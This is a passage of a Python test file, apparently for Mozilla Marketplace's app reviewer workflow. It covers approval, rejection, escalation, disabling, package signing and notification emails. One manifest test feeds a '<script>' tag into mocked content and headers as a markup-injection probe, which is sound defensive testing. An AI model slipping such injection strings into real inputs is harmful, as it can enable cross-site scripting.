eq_(EscalationQueue.objects.filter(addon=app).exists(), False)
class TestReviewTransaction(AttachmentManagementMixin, amo.tests.MockEsMixin,
amo.tests.MockBrowserIdMixin,
amo.tests.test_utils.TransactionTestCase):
fixtures = fixture('group_editor', 'user_editor', 'user_editor_group',
'webapp_337141')
def setUp(self):
super(TestReviewTransaction, self).setUp()
self.mock_browser_id()
def get_app(self):
return Webapp.objects.no_cache().get(id=337141)
@mock.patch('mkt.webapps.tasks.update_cached_manifests')
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
@mock.patch('lib.crypto.packaged.sign_app')
def test_public_sign(self, sign_mock, json_mock, update_cached_manifests):
self.app = self.get_app()
self.app.update(status=amo.STATUS_PENDING, is_packaged=True)
self.version = self.app.current_version
self.version.files.all().update(status=amo.STATUS_PENDING)
eq_(self.get_app().status, amo.STATUS_PENDING)
sign_mock.return_value = None # Didn't fail.
json_mock.return_value = {'name': 'Something'}
assert self.client.login(username='[email protected]',
password='password')
data = {'action': 'public', 'comments': 'something'}
data.update(self._attachment_management_form(num=0))
resp = self.client.post(
reverse('reviewers.apps.review', args=[self.app.app_slug]),
data)
eq_(resp.status_code, 302)
eq_(self.get_app().status, amo.STATUS_PUBLIC)
eq_(update_cached_manifests.delay.call_count, 1)
@mock.patch('lib.crypto.packaged.sign_app')
def test_public_sign_failure(self, sign_mock):
# Test fails only on Jenkins, so skipping when run there for now.
if os.environ.get('JENKINS_HOME'):
raise SkipTest()
self.app = self.get_app()
self.app.update(status=amo.STATUS_PENDING, is_packaged=True)
self.version = self.app.current_version
self.version.files.all().update(status=amo.STATUS_PENDING)
# Test fails on Jenkins on the line below; status is STATUS_PUBLIC.
eq_(self.get_app().status, amo.STATUS_PENDING)
sign_mock.side_effect = packaged.SigningError('Bad things happened.')
assert self.client.login(username='[email protected]',
password='password')
data = {'action': 'public', 'comments': 'something'}
data.update(self._attachment_management_form(num=0))
resp = self.client.post(
reverse('reviewers.apps.review', args=[self.app.app_slug]), data)
eq_(resp.status_code, 302)
eq_(self.get_app().status, amo.STATUS_PENDING)
class TestReviewApp(AppReviewerTest, AccessMixin, AttachmentManagementMixin,
PackagedFilesMixin):
fixtures = ['base/platforms', 'base/users'] + fixture('webapp_337141')
def setUp(self):
super(TestReviewApp, self).setUp()
self.create_switch('iarc', db=True)
self.mozilla_contact = '[email protected]'
self.app = self.get_app()
self.app = amo.tests.make_game(self.app, True)
self.app.update(status=amo.STATUS_PENDING,
mozilla_contact=self.mozilla_contact)
self.version = self.app.current_version
self.version.files.all().update(status=amo.STATUS_PENDING)
self.url = reverse('reviewers.apps.review', args=[self.app.app_slug])
self.file = self.version.all_files[0]
self.setup_files()
def get_app(self):
return Webapp.objects.get(id=337141)
def post(self, data, queue='pending'):
res = self.client.post(self.url, data)
self.assert3xx(res, reverse('reviewers.apps.queue_%s' % queue))
def test_review_viewing_ping(self):
eq_(self.client.post(reverse('editors.review_viewing')).status_code,
200)
@mock.patch('mkt.webapps.models.Webapp.in_rereview_queue')
def test_rereview(self, is_rereview_queue):
is_rereview_queue.return_value = True
content = pq(self.client.get(self.url).content)
assert content('#queue-rereview').length
@mock.patch('mkt.webapps.models.Webapp.in_escalation_queue')
def test_escalated(self, in_escalation_queue):
in_escalation_queue.return_value = True
content = pq(self.client.get(self.url).content)
assert content('#queue-escalation').length
def test_cannot_review_my_app(self):
with self.settings(ALLOW_SELF_REVIEWS=False):
self.app.addonuser_set.create(
user=UserProfile.objects.get(username='editor'))
res = self.client.head(self.url)
self.assert3xx(res, reverse('reviewers.home'))
res = self.client.post(self.url)
self.assert3xx(res, reverse('reviewers.home'))
def test_cannot_review_blocklisted_app(self):
self.app.update(status=amo.STATUS_BLOCKED)
res = self.client.get(self.url)
self.assert3xx(res, reverse('reviewers.home'))
res = self.client.post(self.url)
self.assert3xx(res, reverse('reviewers.home'))
def test_review_no_latest_version(self):
self.app.versions.all().delete()
self.app.reload()
eq_(self.app.latest_version, None)
eq_(self.app.current_version, None)
response = self.client.get(self.url)
eq_(response.status_code, 200)
doc = pq(response.content)
assert doc('input[name=action][value=info]').length
assert doc('input[name=action][value=comment]').length
assert not doc('input[name=action][value=public]').length
assert not doc('input[name=action][value=reject]').length
# Also try with a packaged app.
self.app.update(is_packaged=True)
response = self.client.get(self.url)
eq_(response.status_code, 200)
def test_sr_can_review_blocklisted_app(self):
self.app.update(status=amo.STATUS_BLOCKED)
self.login_as_senior_reviewer()
eq_(self.client.get(self.url).status_code, 200)
data = {'action': 'public', 'comments': 'yo'}
data.update(self._attachment_management_form(num=0))
res = self.client.post(self.url, data)
self.assert3xx(res, reverse('reviewers.apps.queue_pending'))
def _check_email(self, msg, subject, with_mozilla_contact=True):
eq_(msg.to, list(self.app.authors.values_list('email', flat=True)))
moz_contacts = [u'']
if with_mozilla_contact and self.mozilla_contact:
moz_contacts = [x.strip()
for x in self.mozilla_contact.split(u',')]
eq_(msg.cc, moz_contacts)
eq_(msg.subject, '%s: %s' % (subject, self.app.name))
eq_(msg.from_email, settings.MKT_REVIEWERS_EMAIL)
eq_(msg.extra_headers['Reply-To'], settings.MKT_REVIEWERS_EMAIL)
def _check_thread(self):
thread = self.app.threads
eq_(thread.count(), 1)
thread = thread.get()
perms = ('developer', 'reviewer', 'staff')
for key in perms:
assert getattr(thread, 'read_permission_%s' % key)
def _check_admin_email(self, msg, subject):
eq_(msg.to, [settings.MKT_SENIOR_EDITORS_EMAIL])
eq_(msg.subject, '%s: %s' % (subject, self.app.name))
eq_(msg.from_email, settings.MKT_REVIEWERS_EMAIL)
eq_(msg.extra_headers['Reply-To'], settings.MKT_REVIEWERS_EMAIL)
def _check_email_body(self, msg):
body = msg.message().as_string()
url = self.app.get_url_path(add_prefix=False)
assert url in body, 'Could not find apps detail URL in %s' % msg
def _check_log(self, action):
assert AppLog.objects.filter(
addon=self.app, activity_log__action=action.id).exists(), (
"Didn't find `%s` action in logs." % action.short)
def _check_score(self, reviewed_type):
scores = ReviewerScore.objects.all()
assert len(scores) > 0
eq_(scores[0].score, amo.REVIEWED_SCORES[reviewed_type])
eq_(scores[0].note_key, reviewed_type)
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
def test_pending_to_public_w_device_overrides(self, storefront_mock):
AddonDeviceType.objects.create(addon=self.app,
device_type=amo.DEVICE_DESKTOP.id)
AddonDeviceType.objects.create(addon=self.app,
device_type=amo.DEVICE_TABLET.id)
eq_(self.app.make_public, amo.PUBLIC_IMMEDIATELY)
data = {'action': 'public', 'device_types': '', 'browsers': '',
'comments': 'something',
'device_override': [amo.DEVICE_DESKTOP.id]}
data.update(self._attachment_management_form(num=0))
self.post(data)
app = self.get_app()
eq_(app.make_public, amo.PUBLIC_WAIT)
eq_(app.status, amo.STATUS_PUBLIC_WAITING)
eq_([o.id for o in app.device_types], [amo.DEVICE_DESKTOP.id])
self._check_log(amo.LOG.REVIEW_DEVICE_OVERRIDE)
eq_(len(mail.outbox), 1)
msg = mail.outbox[0]
self._check_email(msg, 'App approved but waiting')
self._check_email_body(msg)
assert not storefront_mock.called
def test_pending_to_reject_w_device_overrides(self):
# This shouldn't be possible unless there's form hacking.
AddonDeviceType.objects.create(addon=self.app,
device_type=amo.DEVICE_DESKTOP.id)
AddonDeviceType.objects.create(addon=self.app,
device_type=amo.DEVICE_TABLET.id)
eq_(self.app.make_public, amo.PUBLIC_IMMEDIATELY)
data = {'action': 'reject', 'device_types': '', 'browsers': '',
'comments': 'something',
'device_override': [amo.DEVICE_DESKTOP.id]}
data.update(self._attachment_management_form(num=0))
self.post(data)
app = self.get_app()
eq_(app.make_public, amo.PUBLIC_IMMEDIATELY)
eq_(app.status, amo.STATUS_REJECTED)
eq_(set([o.id for o in app.device_types]),
set([amo.DEVICE_DESKTOP.id, amo.DEVICE_TABLET.id]))
eq_(len(mail.outbox), 1)
msg = mail.outbox[0]
self._check_email(msg, 'Your submission has been rejected')
self._check_email_body(msg)
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
def test_pending_to_public_w_requirements_overrides(self, storefront_mock):
data = {'action': 'public', 'comments': 'something',
'has_sms': True}
data.update(self._attachment_management_form(num=0))
assert not self.app.current_version.features.has_sms
self.post(data)
app = self.get_app()
assert app.current_version.features.has_sms
eq_(app.make_public, amo.PUBLIC_WAIT)
eq_(app.status, amo.STATUS_PUBLIC_WAITING)
self._check_log(amo.LOG.REVIEW_FEATURES_OVERRIDE)
# A reviewer changing features shouldn't generate a re-review.
eq_(RereviewQueue.objects.count(), 0)
assert not storefront_mock.called
def test_pending_to_reject_w_requirements_overrides(self):
# Rejecting an app doesn't let you override features requirements.
data = {'action': 'reject', 'comments': 'something',
'has_sms': True}
data.update(self._attachment_management_form(num=0))
assert not self.app.latest_version.features.has_sms
self.post(data)
app = self.get_app()
eq_(app.make_public, amo.PUBLIC_IMMEDIATELY)
eq_(app.status, amo.STATUS_REJECTED)
assert not app.latest_version.features.has_sms
def test_pending_to_reject_w_requirements_overrides_nothing_changed(self):
self.version.features.update(has_sms=True)
data = {'action': 'public', 'comments': 'something',
'has_sms': True}
data.update(self._attachment_management_form(num=0))
assert self.app.latest_version.features.has_sms
self.post(data)
app = self.get_app()
assert app.latest_version.features.has_sms
eq_(app.make_public, None)
eq_(app.status, amo.STATUS_PUBLIC)
action_id = amo.LOG.REVIEW_FEATURES_OVERRIDE.id
assert not AppLog.objects.filter(
addon=self.app, activity_log__action=action_id).exists()
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
@mock.patch('mkt.reviewers.views.messages.success')
@mock.patch('mkt.webapps.tasks.index_webapps')
@mock.patch('mkt.webapps.tasks.update_cached_manifests')
@mock.patch('mkt.webapps.models.Webapp.update_supported_locales')
@mock.patch('mkt.webapps.models.Webapp.update_name_from_package_manifest')
def test_pending_to_public(self, update_name, update_locales,
update_cached_manifests,
index_webapps, messages, storefront_mock):
index_webapps.delay.reset_mock()
eq_(update_name.call_count, 0)
eq_(update_locales.call_count, 0)
eq_(update_cached_manifests.delay.call_count, 0)
eq_(storefront_mock.call_count, 0)
data = {'action': 'public', 'device_types': '', 'browsers': '',
'comments': 'something'}
data.update(self._attachment_management_form(num=0))
self.post(data)
app = self.get_app()
eq_(app.status, amo.STATUS_PUBLIC)
eq_(app.current_version.files.all()[0].status, amo.STATUS_PUBLIC)
self._check_log(amo.LOG.APPROVE_VERSION)
eq_(len(mail.outbox), 1)
msg = mail.outbox[0]
self._check_email(msg, 'App approved')
self._check_email_body(msg)
self._check_score(amo.REVIEWED_WEBAPP_HOSTED)
eq_(messages.call_args_list[0][0][1],
'"Web App Review" successfully processed (+60 points, 60 total).')
eq_(update_name.call_count, 1)
eq_(update_locales.call_count, 1)
eq_(index_webapps.delay.call_count, 1)
# App is not packaged, no need to call update_cached_manifests.
eq_(update_cached_manifests.delay.call_count, 0)
eq_(storefront_mock.call_count, 1)
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
@mock.patch('mkt.reviewers.views.messages.success')
@mock.patch('mkt.webapps.tasks.index_webapps')
@mock.patch('mkt.webapps.tasks.update_cached_manifests')
@mock.patch('mkt.webapps.models.Webapp.update_supported_locales')
@mock.patch('mkt.webapps.models.Webapp.update_name_from_package_manifest')
def test_pending_to_public_notification_translation(self, update_name,
update_locales, update_cached_manifests, index_webapps, messages,
storefront_mock):
data = {'action': 'public', 'device_types': '', 'browsers': '',
'comments': 'something'}
data.update(self._attachment_management_form(num=0))
self.client.post(self.url, data, HTTP_ACCEPT_LANGUAGE='es')
eq_(messages.call_args_list[0][0][1],
u'"Valoración de la aplicación web" successfully processed '
u'(+60 points, 60 total).')
@mock.patch('mkt.reviewers.views.messages.success', new=mock.Mock)
def test_incomplete_cant_approve(self):
self.app.update(status=amo.STATUS_NULL)
self.app.latest_version.files.update(status=amo.STATUS_NULL)
data = {'action': 'public', 'comments': 'something'}
data.update(self._attachment_management_form(num=0))
self.post(data)
# Still incomplete.
eq_(self.get_app().status, amo.STATUS_NULL)
def test_notification_email_translation(self):
"""Test that the app name is translated with the app's default_locale
and not the reviewer's when we are sending notification emails."""
original_name = unicode(self.app.name)
fr_translation = u'Mais allô quoi!'
es_translation = u'¿Dónde está la biblioteca?'
self.app.name = {
'fr': fr_translation,
'es': es_translation,
}
self.app.default_locale = 'fr'
self.app.save()
data = {'action': 'public', 'comments': 'something'}
data.update(self._attachment_management_form(num=0))
self.client.post(self.url, data, HTTP_ACCEPT_LANGUAGE='es')
eq_(translation.get_language(), 'es')
eq_(len(mail.outbox), 1)
msg = mail.outbox[0]
assert not original_name in msg.subject
assert not es_translation in msg.subject
assert fr_translation in msg.subject
assert not original_name in msg.body
assert not es_translation in msg.body
assert fr_translation in msg.body
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
@mock.patch('mkt.webapps.tasks.index_webapps')
@mock.patch('mkt.webapps.tasks.update_cached_manifests')
@mock.patch('mkt.webapps.models.Webapp.update_supported_locales')
@mock.patch('mkt.webapps.models.Webapp.update_name_from_package_manifest')
@mock.patch('lib.crypto.packaged.sign')
def test_approve_packaged_app(self, sign_mock, update_name,
update_locales, update_cached_manifests, index_webapps,
storefront_mock):
self.get_app().update(is_packaged=True)
index_webapps.delay.reset_mock()
eq_(sign_mock.call_count, 0)
eq_(update_name.call_count, 0)
eq_(update_locales.call_count, 0)
eq_(update_cached_manifests.delay.call_count, 0)
eq_(storefront_mock.call_count, 0)
data = {'action': 'public', 'comments': 'something'}
data.update(self._attachment_management_form(num=0))
self.post(data)
eq_(self.get_app().status, amo.STATUS_PUBLIC)
eq_(sign_mock.call_count, 1)
eq_(update_name.call_count, 1)
eq_(update_locales.call_count, 1)
eq_(update_cached_manifests.delay.call_count, 1)
eq_(storefront_mock.call_count, 1)
eq_(sign_mock.call_args[0][0], self.get_app().current_version.pk)
@mock.patch('lib.crypto.packaged.sign')
def test_require_sig_for_public(self, sign):
sign.side_effect = packaged.SigningError
self.get_app().update(is_packaged=True)
data = {'action': 'public', 'comments': 'something'}
data.update(self._attachment_management_form(num=0))
self.client.post(self.url, data)
eq_(self.get_app().status, amo.STATUS_PENDING)
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
def test_pending_to_public_no_mozilla_contact(self, storefront_mock):
self.app.update(mozilla_contact='')
data = {'action': 'public', 'device_types': '', 'browsers': '',
'comments': 'something'}
data.update(self._attachment_management_form(num=0))
self.post(data)
app = self.get_app()
eq_(app.status, amo.STATUS_PUBLIC)
eq_(app.current_version.files.all()[0].status, amo.STATUS_PUBLIC)
self._check_log(amo.LOG.APPROVE_VERSION)
eq_(len(mail.outbox), 1)
msg = mail.outbox[0]
self._check_email(msg, 'App approved', with_mozilla_contact=False)
self._check_email_body(msg)
self._check_score(amo.REVIEWED_WEBAPP_HOSTED)
assert storefront_mock.called
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
@mock.patch('mkt.webapps.tasks.index_webapps')
@mock.patch('mkt.webapps.tasks.update_cached_manifests')
@mock.patch('mkt.webapps.models.Webapp.update_supported_locales')
@mock.patch('mkt.webapps.models.Webapp.update_name_from_package_manifest')
def test_pending_to_public_waiting(self, update_name, update_locales,
update_cached_manifests, index_webapps,
storefront_mock):
self.get_app().update(_signal=False, make_public=amo.PUBLIC_WAIT)
eq_(update_name.call_count, 0)
eq_(update_locales.call_count, 0)
eq_(index_webapps.delay.call_count, 0)
eq_(update_cached_manifests.delay.call_count, 0)
data = {'action': 'public', 'device_types': '', 'browsers': '',
'comments': 'something'}
data.update(self._attachment_management_form(num=0))
self.post(data)
app = self.get_app()
eq_(app.status, amo.STATUS_PUBLIC_WAITING)
eq_(app._current_version.files.all()[0].status,
amo.STATUS_PUBLIC_WAITING)
self._check_log(amo.LOG.APPROVE_VERSION_WAITING)
eq_(len(mail.outbox), 1)
msg = mail.outbox[0]
self._check_email(msg, 'App approved but waiting')
self._check_email_body(msg)
self._check_score(amo.REVIEWED_WEBAPP_HOSTED)
# The app is not public yet, so we shouldn't call those:
eq_(update_name.call_count, 0)
eq_(update_locales.call_count, 0)
eq_(update_cached_manifests.delay.call_count, 0)
eq_(storefront_mock.call_count, 0)
# Indexing should still happen:
eq_(index_webapps.delay.call_count, 1)
@mock.patch('lib.crypto.packaged.sign')
def test_public_waiting_signs(self, sign):
self.get_app().update(is_packaged=True, make_public=amo.PUBLIC_WAIT)
data = {'action': 'public', 'comments': 'something'}
data.update(self._attachment_management_form(num=0))
self.post(data)
eq_(self.get_app().status, amo.STATUS_PUBLIC_WAITING)
eq_(sign.call_args[0][0], self.get_app().current_version.pk)
def test_pending_to_reject(self):
files = list(self.version.files.values_list('id', flat=True))
data = {'action': 'reject', 'comments': 'suxor'}
data.update(self._attachment_management_form(num=0))
self.post(data)
app = self.get_app()
eq_(app.status, amo.STATUS_REJECTED)
eq_(File.objects.filter(id__in=files)[0].status, amo.STATUS_DISABLED)
self._check_log(amo.LOG.REJECT_VERSION)
eq_(len(mail.outbox), 1)
msg = mail.outbox[0]
self._check_email(msg, 'Your submission has been rejected')
self._check_email_body(msg)
self._check_score(amo.REVIEWED_WEBAPP_HOSTED)
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
@mock.patch('mkt.webapps.tasks.index_webapps')
@mock.patch('mkt.webapps.tasks.update_cached_manifests')
@mock.patch('mkt.webapps.models.Webapp.update_supported_locales')
@mock.patch('mkt.webapps.models.Webapp.update_name_from_package_manifest')
@mock.patch('lib.crypto.packaged.sign_app')
def test_packaged_multiple_versions_approve(self, sign_app_mock,
update_name, update_locales, update_cached_manifests,
index_webapps, storefront_mock):
self.app.update(status=amo.STATUS_PUBLIC, is_packaged=True)
self.app.latest_version.files.update(status=amo.STATUS_PUBLIC)
new_version = version_factory(addon=self.app,
file_kw={'status': amo.STATUS_PENDING})
index_webapps.delay.reset_mock()
eq_(sign_app_mock.call_count, 0)
eq_(update_name.call_count, 0)
eq_(update_locales.call_count, 0)
eq_(update_cached_manifests.delay.call_count, 0)
eq_(storefront_mock.call_count, 0)
data = {'action': 'public', 'device_types': '', 'browsers': '',
'comments': 'something'}
data.update(self._attachment_management_form(num=0))
self.post(data)
app = self.get_app()
new_version.reload()
eq_(app.status, amo.STATUS_PUBLIC)
self.assertCloseToNow(new_version.reviewed)
eq_(new_version.files.all()[0].status, amo.STATUS_PUBLIC)
self._check_log(amo.LOG.APPROVE_VERSION)
eq_(len(mail.outbox), 1)
msg = mail.outbox[0]
self._check_email(msg, 'App approved')
self._check_email_body(msg)
self._check_score(amo.REVIEWED_WEBAPP_UPDATE)
eq_(sign_app_mock.call_count, 1)
eq_(update_name.call_count, 1)
eq_(update_locales.call_count, 1)
eq_(index_webapps.delay.call_count, 1)
eq_(update_cached_manifests.delay.call_count, 1)
eq_(storefront_mock.call_count, 1)
def test_packaged_multiple_versions_reject(self):
self.app.update(status=amo.STATUS_PUBLIC, is_packaged=True)
self.app.current_version.files.update(status=amo.STATUS_PUBLIC)
new_version = version_factory(addon=self.app)
new_version.files.all().update(status=amo.STATUS_PENDING)
data = {'action': 'reject', 'device_types': '', 'browsers': '',
'comments': 'something'}
data.update(self._attachment_management_form(num=0))
self.post(data)
app = self.get_app()
eq_(app.status, amo.STATUS_PUBLIC)
eq_(new_version.reviewed, None)
eq_(new_version.files.all()[0].status, amo.STATUS_DISABLED)
self._check_log(amo.LOG.REJECT_VERSION)
eq_(len(mail.outbox), 1)
msg = mail.outbox[0]
self._check_email(msg, 'Your submission has been rejected')
self._check_email_body(msg)
self._check_score(amo.REVIEWED_WEBAPP_UPDATE)
@mock.patch('mkt.reviewers.views.messages.success')
def test_pending_to_escalation(self, messages):
data = {'action': 'escalate', 'comments': 'soup her man'}
data.update(self._attachment_management_form(num=0))
self.post(data)
eq_(EscalationQueue.objects.count(), 1)
self._check_log(amo.LOG.ESCALATE_MANUAL)
# Test 2 emails: 1 to dev, 1 to admin.
eq_(len(mail.outbox), 2)
dev_msg = mail.outbox[0]
self._check_email(dev_msg, 'Submission Update')
adm_msg = mail.outbox[1]
self._check_admin_email(adm_msg, 'Escalated Review Requested')
eq_(messages.call_args_list[0][0][1], 'Review successfully processed.')
def test_pending_to_disable_senior_reviewer(self):
self.login_as_senior_reviewer()
self.app.update(status=amo.STATUS_PUBLIC)
self.app.current_version.files.update(status=amo.STATUS_PUBLIC)
data = {'action': 'disable', 'comments': 'disabled ur app'}
data.update(self._attachment_management_form(num=0))
self.post(data)
app = self.get_app()
eq_(app.status, amo.STATUS_DISABLED)
eq_(app.latest_version.files.all()[0].status, amo.STATUS_DISABLED)
self._check_log(amo.LOG.APP_DISABLED)
eq_(len(mail.outbox), 1)
self._check_email(mail.outbox[0], 'App disabled by reviewer')
def test_pending_to_disable(self):
self.app.update(status=amo.STATUS_PUBLIC)
self.app.current_version.files.update(status=amo.STATUS_PUBLIC)
data = {'action': 'disable', 'comments': 'disabled ur app'}
data.update(self._attachment_management_form(num=0))
res = self.client.post(self.url, data)
eq_(res.status_code, 200)
ok_('action' in res.context['form'].errors)
eq_(self.get_app().status, amo.STATUS_PUBLIC)
eq_(len(mail.outbox), 0)
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
def test_escalation_to_public(self, storefront_mock):
EscalationQueue.objects.create(addon=self.app)
eq_(self.app.status, amo.STATUS_PENDING)
data = {'action': 'public', 'device_types': '', 'browsers': '',
'comments': 'something'}
data.update(self._attachment_management_form(num=0))
self.post(data, queue='escalated')
app = self.get_app()
eq_(app.status, amo.STATUS_PUBLIC)
eq_(app.current_version.files.all()[0].status, amo.STATUS_PUBLIC)
self._check_log(amo.LOG.APPROVE_VERSION)
eq_(EscalationQueue.objects.count(), 0)
eq_(len(mail.outbox), 1)
msg = mail.outbox[0]
self._check_email(msg, 'App approved')
self._check_email_body(msg)
assert storefront_mock.called
def test_escalation_to_reject(self):
EscalationQueue.objects.create(addon=self.app)
eq_(self.app.status, amo.STATUS_PENDING)
files = list(self.version.files.values_list('id', flat=True))
data = {'action': 'reject', 'device_types': '', 'browsers': '',
'comments': 'something'}
data.update(self._attachment_management_form(num=0))
self.post(data, queue='escalated')
app = self.get_app()
eq_(app.status, amo.STATUS_REJECTED)
eq_(File.objects.filter(id__in=files)[0].status, amo.STATUS_DISABLED)
self._check_log(amo.LOG.REJECT_VERSION)
eq_(EscalationQueue.objects.count(), 0)
eq_(len(mail.outbox), 1)
msg = mail.outbox[0]
self._check_email(msg, 'Your submission has been rejected')
self._check_email_body(msg)
self._check_score(amo.REVIEWED_WEBAPP_HOSTED)
def test_escalation_to_disable_senior_reviewer(self):
self.login_as_senior_reviewer()
EscalationQueue.objects.create(addon=self.app)
self.app.update(status=amo.STATUS_PUBLIC)
self.app.latest_version.files.update(status=amo.STATUS_PUBLIC)
data = {'action': 'disable', 'comments': 'disabled ur app'}
data.update(self._attachment_management_form(num=0))
self.post(data, queue='escalated')
app = self.get_app()
eq_(app.status, amo.STATUS_DISABLED)
eq_(app.latest_version.files.all()[0].status, amo.STATUS_DISABLED)
self._check_log(amo.LOG.APP_DISABLED)
eq_(EscalationQueue.objects.count(), 0)
eq_(len(mail.outbox), 1)
self._check_email(mail.outbox[0], 'App disabled by reviewer')
def test_escalation_to_disable(self):
EscalationQueue.objects.create(addon=self.app)
self.app.update(status=amo.STATUS_PUBLIC)
self.app.latest_version.files.update(status=amo.STATUS_PUBLIC)
data = {'action': 'disable', 'comments': 'disabled ur app'}
data.update(self._attachment_management_form(num=0))
res = self.client.post(self.url, data, queue='escalated')
eq_(res.status_code, 200)
ok_('action' in res.context['form'].errors)
eq_(self.get_app().status, amo.STATUS_PUBLIC)
eq_(EscalationQueue.objects.count(), 1)
eq_(len(mail.outbox), 0)
def test_clear_escalation(self):
self.app.update(status=amo.STATUS_PUBLIC)
self.app.latest_version.files.update(status=amo.STATUS_PUBLIC)
EscalationQueue.objects.create(addon=self.app)
data = {'action': 'clear_escalation', 'comments': 'all clear'}
data.update(self._attachment_management_form(num=0))
self.post(data, queue='escalated')
eq_(EscalationQueue.objects.count(), 0)
self._check_log(amo.LOG.ESCALATION_CLEARED)
# Ensure we don't send email on clearing escalations.
eq_(len(mail.outbox), 0)
def test_rereview_to_reject(self):
RereviewQueue.objects.create(addon=self.app)
self.app.update(status=amo.STATUS_PUBLIC)
self.app.latest_version.files.update(status=amo.STATUS_PUBLIC)
data = {'action': 'reject', 'device_types': '', 'browsers': '',
'comments': 'something'}
data.update(self._attachment_management_form(num=0))
self.post(data, queue='rereview')
eq_(self.get_app().status, amo.STATUS_REJECTED)
self._check_log(amo.LOG.REJECT_VERSION)
eq_(RereviewQueue.objects.count(), 0)
eq_(len(mail.outbox), 1)
msg = mail.outbox[0]
self._check_email(msg, 'Your submission has been rejected')
self._check_email_body(msg)
self._check_score(amo.REVIEWED_WEBAPP_REREVIEW)
def test_rereview_to_disable_senior_reviewer(self):
self.login_as_senior_reviewer()
RereviewQueue.objects.create(addon=self.app)
self.app.update(status=amo.STATUS_PUBLIC)
self.app.latest_version.files.update(status=amo.STATUS_PUBLIC)
data = {'action': 'disable', 'device_types': '', 'browsers': '',
'comments': 'something'}
data.update(self._attachment_management_form(num=0))
self.post(data, queue='rereview')
eq_(self.get_app().status, amo.STATUS_DISABLED)
self._check_log(amo.LOG.APP_DISABLED)
eq_(RereviewQueue.objects.filter(addon=self.app).count(), 0)
eq_(len(mail.outbox), 1)
self._check_email(mail.outbox[0], 'App disabled by reviewer')
def test_rereview_to_disable(self):
RereviewQueue.objects.create(addon=self.app)
self.app.update(status=amo.STATUS_PUBLIC)
self.app.latest_version.files.update(status=amo.STATUS_PUBLIC)
data = {'action': 'disable', 'comments': 'disabled ur app'}
data.update(self._attachment_management_form(num=0))
res = self.client.post(self.url, data, queue='rereview')
eq_(res.status_code, 200)
ok_('action' in res.context['form'].errors)
eq_(self.get_app().status, amo.STATUS_PUBLIC)
eq_(RereviewQueue.objects.filter(addon=self.app).count(), 1)
eq_(len(mail.outbox), 0)
def test_clear_rereview(self):
self.app.update(status=amo.STATUS_PUBLIC)
self.app.latest_version.files.update(status=amo.STATUS_PUBLIC)
RereviewQueue.objects.create(addon=self.app)
data = {'action': 'clear_rereview', 'comments': 'all clear'}
data.update(self._attachment_management_form(num=0))
self.post(data, queue='rereview')
eq_(RereviewQueue.objects.count(), 0)
self._check_log(amo.LOG.REREVIEW_CLEARED)
# Ensure we don't send email on clearing re-reviews.
eq_(len(mail.outbox), 0)
self._check_score(amo.REVIEWED_WEBAPP_REREVIEW)
def test_rereview_to_escalation(self):
RereviewQueue.objects.create(addon=self.app)
data = {'action': 'escalate', 'comments': 'soup her man'}
data.update(self._attachment_management_form(num=0))
self.post(data, queue='rereview')
eq_(EscalationQueue.objects.count(), 1)
self._check_log(amo.LOG.ESCALATE_MANUAL)
# Test 2 emails: 1 to dev, 1 to admin.
eq_(len(mail.outbox), 2)
dev_msg = mail.outbox[0]
self._check_email(dev_msg, 'Submission Update')
adm_msg = mail.outbox[1]
self._check_admin_email(adm_msg, 'Escalated Review Requested')
def test_more_information(self):
# Test the same for all queues.
data = {'action': 'info', 'comments': 'Knead moor in faux'}
data.update(self._attachment_management_form(num=0))
self.post(data)
eq_(self.get_app().status, amo.STATUS_PENDING)
self._check_log(amo.LOG.REQUEST_INFORMATION)
vqs = self.get_app().versions.all()
eq_(vqs.count(), 1)
eq_(vqs.filter(has_info_request=True).count(), 1)
eq_(len(mail.outbox), 1)
msg = mail.outbox[0]
self._check_email(msg, 'More information needed to review')
def test_multi_cc_email(self):
# Test multiple mozilla_contact emails via more information.
contacts = [u'á@b.com', u'ç@d.com']
self.mozilla_contact = ', '.join(contacts)
self.app.update(mozilla_contact=self.mozilla_contact)
data = {'action': 'info', 'comments': 'Knead moor in faux'}
data.update(self._attachment_management_form(num=0))
self.post(data)
eq_(len(mail.outbox), 1)
msg = mail.outbox[0]
self._check_email(msg, 'More information needed to review')
def test_comment(self):
# Test the same for all queues.
data = {'action': 'comment', 'comments': 'mmm, nice app'}
data.update(self._attachment_management_form(num=0))
self.post(data)
eq_(len(mail.outbox), 0)
self._check_log(amo.LOG.COMMENT_VERSION)
def test_receipt_no_node(self):
res = self.client.get(self.url)
eq_(len(pq(res.content)('#receipt-check-result')), 0)
def test_receipt_has_node(self):
self.get_app().update(premium_type=amo.ADDON_PREMIUM)
res = self.client.get(self.url)
eq_(len(pq(res.content)('.reviewers-desktop #receipt-check-result')),
1)
eq_(len(pq(res.content)('.reviewers-mobile #receipt-check-result')),
1)
@mock.patch('mkt.reviewers.views.requests.get')
def test_manifest_json(self, mock_get):
m = mock.Mock()
m.content = 'the manifest contents <script>'
m.headers = CaseInsensitiveDict({'content-type':
'application/x-web-app-manifest+json <script>'})
mock_get.return_value = m
expected = {
'content': 'the manifest contents <script>',
'headers': {'content-type':
'application/x-web-app-manifest+json <script>'},
'success': True,
'permissions': {}
}
r = self.client.get(reverse('reviewers.apps.review.manifest',
args=[self.app.app_slug]))
eq_(r.status_code, 200)
eq_(json.loads(r.content), expected)
@mock.patch('mkt.reviewers.views.requests.get')
def test_manifest_json_unicode(self, mock_get):
m = mock.Mock()
m.content = u'كك some foreign ish'
m.headers = CaseInsensitiveDict({})
mock_get.return_value = m
r = self.client.get(reverse('reviewers.apps.review.manifest',
args=[self.app.app_slug]))
eq_(r.status_code, 200)
eq_(json.loads(r.content), {'content': u'كك some foreign ish',
'headers': {}, 'success': True,
'permissions': {}})
@mock.patch('mkt.reviewers.views.requests.get')
def test_manifest_json_encoding(self, mock_get):
m = mock.Mock()
with storage.open(self.manifest_path('non-utf8.webapp')) as fp:
m.content = fp.read()
m.headers = CaseInsensitiveDict({})
mock_get.return_value = m
